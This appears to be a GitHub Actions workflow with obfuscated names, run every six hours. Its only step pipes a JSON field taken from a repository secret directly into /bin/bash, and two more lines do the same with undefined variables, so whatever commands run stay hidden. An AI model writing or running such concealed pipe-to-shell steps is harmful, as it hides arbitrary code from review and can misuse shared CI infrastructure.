name: ruanxiaowu19871010
on:
  workflow_dispatch:
  schedule:
    - cron: '45 1/6 * * *'

jobs:  # 2010
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: ruanxiaowu19871010
        env:
          eadlp691: ${{ secrets.eadlp691 }}
        run: |
          echo $eadlp691 | jq -r .ex955 | /bin/bash
          echo $bvt938 | jq -r .ah9934 | /bin/bash
          echo $ivki0023 | jq -r .ztyd85433 | /bin/bash

